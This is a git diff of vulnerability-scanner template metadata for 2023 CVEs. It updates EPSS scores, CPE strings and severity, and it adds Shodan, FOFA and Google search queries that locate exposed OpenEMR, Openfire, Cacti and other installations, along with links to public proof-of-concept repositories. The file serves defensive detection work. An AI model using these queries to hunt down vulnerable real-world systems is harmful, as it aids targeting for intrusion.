+17,13 @@ info: cwe-id: CWE-79 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - vendor: open-emr - product: openemr - fofa-query: app="OpenEMR" - shodan-query: http.favicon.hash:1971268439 verified: true max-request: 1 + vendor: open-emr + product: openemr + shodan-query: http.favicon.hash:1971268439 + fofa-query: app="OpenEMR" + google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr http: diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 9bf1169f66..e17ed58564 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29622 cwe-id: CWE-89 - epss-score: 0.01215 - epss-percentile: 0.83777 + epss-score: 0.02992 + epss-percentile: 0.90889 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 3d9f1ab7bc..fc3fca33d9 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29623 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39785 + epss-score: 0.00135 + epss-percentile: 0.48708 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 2875a9c12c..02789b70ce 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2982 cwe-id: CWE-288 - epss-score: 0.01566 - epss-percentile: 0.86966 + epss-score: 0.01321 + epss-percentile: 0.85956 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 46f7357b4a..dd030fe1a8 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29827 cwe-id: CWE-74 - epss-score: 0.34849 - epss-percentile: 0.97005 + epss-score: 0.09885 + epss-percentile: 0.94826 cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 007a2a898d..19915b1819 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29887 cwe-id: CWE-22 - epss-score: 0.00439 - epss-percentile: 0.721 + epss-score: 0.00553 + epss-percentile: 0.7749 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 135a9b9ed2..c13b61d3fb 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -20,14 +20,14 @@ info: cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 - epss-score: 0.01262 - epss-percentile: 0.84199 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* + epss-score: 0.54171 + epss-percentile: 0.97625 + cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec - product: solarview_compact_firmware + product: solarview_compact shodan-query: http.html:"SolarView Compact" tags: cve,cve2023,lfi,solarview,edb,contec diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index bf1c5ccaef..481b36b276 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -13,13 +13,16 @@ info: reference: - https://github.com/PowerJob/PowerJob/issues/585 - https://nvd.nist.gov/vuln/detail/CVE-2023-29922 + - https://github.com/CN016/Powerjob-CVE-2023-29922- + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/1820112015/CVE-2023-29923 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-29922 cwe-id: CWE-1188 - epss-score: 0.00791 - epss-percentile: 0.79603 + epss-score: 0.00822 + epss-percentile: 0.81865 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 2ec2422aee..d583d153f9 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -13,19 +13,23 @@ info: reference: - https://github.com/PowerJob/PowerJob/issues/587 - https://nvd.nist.gov/vuln/detail/CVE-2023-29923 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Le1a/CVE-2023-29923 + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-29923 cwe-id: CWE-276 - epss-score: 0.00336 - epss-percentile: 0.68252 + epss-score: 0.01633 + epss-percentile: 0.8751 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powerjob product: powerjob + shodan-query: http.html:"powerjob" fofa-query: app="PowerJob" tags: cve2023,cve,powerjob,unauth diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 264135b800..7b305e3445 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30013 cwe-id: CWE-78 - epss-score: 0.9257 - epss-percentile: 0.98815 + epss-score: 0.96305 + epss-percentile: 0.99539 cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 50f4f54e0d..d6e7cfa5b3 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30019 cwe-id: CWE-918 - epss-score: 0.00094 - epss-percentile: 0.38689 + epss-score: 0.0016 + epss-percentile: 0.52577 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index b2d26e1d2f..f7aff3b56b 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30150 cwe-id: CWE-89 - epss-score: 0.0409 - epss-percentile: 0.91941 + epss-score: 0.04505 + epss-percentile: 0.92462 cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 031c0b56bf..50a5e1519b 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30210 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29245 + epss-score: 0.00113 + epss-percentile: 0.44693 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 6537669de8..2189a95c4e 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30212 cwe-id: CWE-79 - epss-score: 0.02578 - epss-percentile: 0.89997 + epss-score: 0.03007 + epss-percentile: 0.90911 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 7904f9a208..c934e88c87 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30256 cwe-id: CWE-79 - epss-score: 0.0206 - epss-percentile: 0.87855 + epss-score: 0.00895 + epss-percentile: 0.8263 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul http: diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index a5c4a2258f..8566de4134 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -13,13 +13,14 @@ info: - https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258 - http://packetstormsecurity.com/files/175672/MagnusBilling-Remote-Command-Execution.html - https://github.com/magnussolution/magnusbilling7/commit/ccff9f6370f530cc41ef7de2e31d7590a0fdb8c3 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-30258 cwe-id: CWE-78 - epss-score: 0.48813 - epss-percentile: 0.97205 + epss-score: 0.25604 + epss-percentile: 0.96696 cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: magnussolution product: magnusbilling shodan-query: http.html:"magnusbilling" + fofa-query: body="magnusbilling" tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution http: diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 620df48b01..317126eea6 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-30534 cwe-id: CWE-502 epss-score: 0.09326 - epss-percentile: 0.94158 + epss-percentile: 0.94688 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: cacti product: cacti shodan-query: title:"Cacti" + fofa-query: icon_hash="-1797138069" + google-query: intitle:"cacti" tags: cve,cve2023,cacti,authenticated http: diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index f760b82b3d..cb4d80cec2 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-30625 cwe-id: CWE-89 - epss-score: 0.94833 - epss-percentile: 0.99223 + epss-score: 0.94887 + epss-percentile: 0.99286 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index c30c0baedf..6db19106f8 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -21,14 +21,13 @@ info: epss-percentile: 0.50816 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: inspireui product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index a3784c4e80..ea14897000 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30777 cwe-id: CWE-79 - epss-score: 0.00338 - epss-percentile: 0.70791 + epss-score: 0.00527 + epss-percentile: 0.76946 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index a1c8a9246e..b5a5248335 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30868 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28435 + epss-score: 0.00114 + epss-percentile: 0.44861 cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 5622e5128f..70421c8cae 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -19,14 +19,16 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30943 cwe-id: CWE-610,CWE-73 - epss-score: 0.01661 - epss-percentile: 0.87339 + epss-score: 0.01155 + epss-percentile: 0.84809 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: moodle product: moodle shodan-query: title:"Moodle" + fofa-query: title="moodle" + google-query: intitle:"moodle" tags: cve,cve2023,moodle,xss,rce,authenticated http: diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 98cab63fb6..c71f0a5eee 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-31059 cwe-id: CWE-22 - epss-score: 0.00393 - epss-percentile: 0.70614 + epss-score: 0.00878 + epss-percentile: 0.8245 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: product: repetier-server shodan-query: title:"Repetier-Server" fofa-query: title="Repetier-Server" + google-query: intitle:"repetier-server" tags: cve2023,cve,repetier,lfi,repetier-server http: diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 5511a3bccd..df4af1a7a0 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31446 - epss-score: 0.00066 - epss-percentile: 0.27828 + epss-score: 0.01982 + epss-percentile: 0.8876 cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: cassianetworks product: xc1000_firmware shodan-query: html:"Cassia Bluetooth Gateway Management Platform" + fofa-query: body="cassia bluetooth gateway management platform" tags: cve,cve2023,rce,cassia,gateway http: diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index a18e260a91..809e10ea89 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -14,14 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31465 - epss-score: 0.00841 - epss-percentile: 0.80295 + epss-score: 0.0156 + epss-percentile: 0.87192 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fsmlabs product: timekeeper shodan-query: http.favicon.hash:2134367771 + fofa-query: icon_hash=2134367771 tags: cve,cve2023,timekeeper,rce,oast,fsmlabs http: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index c7109ccf8f..1931ca6ce2 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-31548 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32076 + epss-score: 0.00089 + epss-percentile: 0.37968 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index 5bddf6b981..f901dafa16 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-32077 - cwe-id: CWE-321,CWE-798 - epss-score: 0.0006 - epss-percentile: 0.24707 + cwe-id: CWE-798,CWE-321 + epss-score: 0.08146 + epss-percentile: 0.94315 cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* metadata: verified: true @@ -20,6 +20,7 @@ info: vendor: gravitl product: netmaker shodan-query: html:"netmaker" + fofa-query: body="netmaker" tags: cve,cve2023,info-key,netmaker,exposure http: diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index 40e72fb07b..d5ae54008e 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-3219 cwe-id: CWE-639 - epss-score: 0.17304 - epss-percentile: 0.95981 + epss-score: 0.08542 + epss-percentile: 0.94439 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,10 @@ info: vendor: myeventon product: eventon framework: wordpress + shodan-query: http.html:/wp-content/plugins/eventon/ + fofa-query: wp-content/plugins/eventon/ publicwww-query: "/wp-content/plugins/eventon-lite/" + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon http: diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 9578cfe944..a1ddc1903f 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 - epss-score: 0.03267 - epss-percentile: 0.91046 + epss-score: 0.08653 + epss-percentile: 0.94489 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 26a48d8fe1..7c82376fb8 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 - epss-score: 0.97384 - epss-percentile: 0.99904 + epss-score: 0.97409 + epss-percentile: 0.99927 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: igniterealtime product: openfire shodan-query: title:"openfire" + fofa-query: title="openfire" + google-query: intitle:"openfire" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime http: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 8b70377236..3b8370abe5 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 - epss-score: 0.43167 - epss-percentile: 0.97254 + epss-score: 0.34709 + epss-percentile: 0.97105 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 249fe93d11..1fb2c9f850 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33338 cwe-id: CWE-89 - epss-score: 0.0152 - epss-percentile: 0.8674 + epss-score: 0.01754 + epss-percentile: 0.87944 cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index aa6c4e6873..794a2e3ef7 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -25,6 +25,8 @@ info: max-request: 1 vendor: blogengine product: blogengine.net + shodan-query: http.html:"blogengine.net" + fofa-query: body="blogengine.net" tags: cve2023,cve,Blogengine,cms,redirect,blogengine http: diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 804a38e40c..9b16725752 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33439 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.79241 + epss-score: 0.00778 + epss-percentile: 0.81335 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 0f5cb8901a..4f13c943c1 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33440 cwe-id: CWE-434 - epss-score: 0.08056 - epss-percentile: 0.93711 + epss-score: 0.07644 + epss-percentile: 0.94146 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: vendor: faculty_evaluation_system_project product: faculty_evaluation_system tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project - variables: email: "{{randstr}}@{{rand_base(5)}}.com" string: "CVE-2023-33440" diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 9004991282..4c02631ca1 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-3345 cwe-id: CWE-200 - epss-score: 0.00235 - epss-percentile: 0.61522 + epss-score: 0.00446 + epss-percentile: 0.74935 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index cd7f863611..010c64efed 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33510 cwe-id: CWE-668 - epss-score: 0.00347 - epss-percentile: 0.6879 + epss-score: 0.00406 + epss-percentile: 0.73689 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -30,6 +30,7 @@ info: product: jeecg_p3_biz_chat framework: wordpress shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress http: diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 69f89cf485..bd1a73705a 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33568 cwe-id: CWE-552 - epss-score: 0.62868 - epss-percentile: 0.97558 + epss-score: 0.4855 + epss-percentile: 0.97483 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,7 @@ info: vendor: dolibarr product: dolibarr_erp\/crm shodan-query: http.favicon.hash:440258421 + fofa-query: icon_hash=440258421 tags: cve2023,cve,dolibarr,unauth http: diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 2d6c0d98ac..328e959999 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33584 cwe-id: CWE-89 - epss-score: 0.09977 - epss-percentile: 0.94731 + epss-score: 0.06893 + epss-percentile: 0.93907 cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 9d1ec8f566..c20fbd45bb 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33629 cwe-id: CWE-787 - epss-score: 0.00968 - epss-percentile: 0.82988 + epss-score: 0.01254 + epss-percentile: 0.85534 cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index ccf1544419..85b6d868c2 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3368 cwe-id: CWE-78 - epss-score: 0.76057 - epss-percentile: 0.97911 + epss-score: 0.93283 + epss-percentile: 0.99063 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 2bc8975120..8c7e47e1c5 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33831 cwe-id: CWE-77 - epss-score: 0.04822 - epss-percentile: 0.91961 + epss-score: 0.21555 + epss-percentile: 0.96432 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 823a82a3bb..7b7c314455 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -3,12 +3,20 @@ id: CVE-2023-34020 info: name: Uncanny Toolkit for LearnDash - Open Redirection author: LeDoubleTake - severity: low + severity: medium description: | A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security. reference: - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability - https://wordpress.org/plugins/uncanny-learndash-toolkit/ + - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N + cvss-score: 4.7 + cve-id: CVE-2023-34020 + cwe-id: CWE-601 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index e5f230a074..e9e0046db9 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 - epss-score: 0.0172 - epss-percentile: 0.87553 + 